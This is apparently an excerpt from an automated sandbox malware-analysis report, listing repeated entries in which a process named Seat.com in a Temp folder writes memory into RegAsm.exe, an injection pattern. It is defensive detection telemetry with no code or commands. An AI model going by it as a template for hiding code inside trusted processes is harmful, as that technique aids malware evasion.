                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301450Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13014B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301518Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130157CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13015E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301644Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13016A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130170CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301770Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13017D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301838Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130189CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301900Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301964Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13019C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301A2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301A90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301AF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301B58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301BBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301C20Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301C84Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301CE8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301D4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301DB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301E14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301E78Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301EDCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301F40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1301FA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130206CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13020D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302134Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302198Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13021FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302260Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13022C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302328Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130238CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13023F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302454Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13024B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130251CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302580Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13025E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302648Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13026ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302710Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302774Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13027D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130283CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13028A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302904Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302968Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13029CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302A30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302A94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302AF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302B5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302BC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302C24Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302C88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302CECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302D50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302DB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302E18Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302E7CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302EE0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302F44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1302FA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130300CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303070Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13030D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303138Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130319CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303200Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303264Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13032C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130332CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303390Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13033F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303458Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13034BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303520Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303584Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13035E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130364CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13036B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303714Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303778Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13037DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303840Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13038A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303908Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130396CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13039D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303A34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303A98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303AFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303B60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303BC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303C28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303C8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303CF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303D54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303DB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303E1CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303E80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303EE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303F48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1303FACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304010Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304074Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13040D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130413CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13041A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304204Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304268Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13042CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304330Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304394Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13043F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130445CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13044C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304524Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304588Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13045ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304650Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13046B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304718Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130477CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13047E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13048A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130490CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304970Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13049D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304A38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304A9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304B00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304B64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304BC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304C2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304C90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304CF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304D58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304DBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304E20Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304E84Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304EE8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304F4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304FB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305014Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305078Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13050DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305140Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13051A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305208Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130526CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13052D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305334Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305398Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13053FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305460Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13054C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305528Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130558CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13055F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305654Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13056B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130571CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305780Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13057E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305848Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13058ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305910Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305974Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13059D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305A3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305AA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305B04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305B68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305BCCJump to behavior
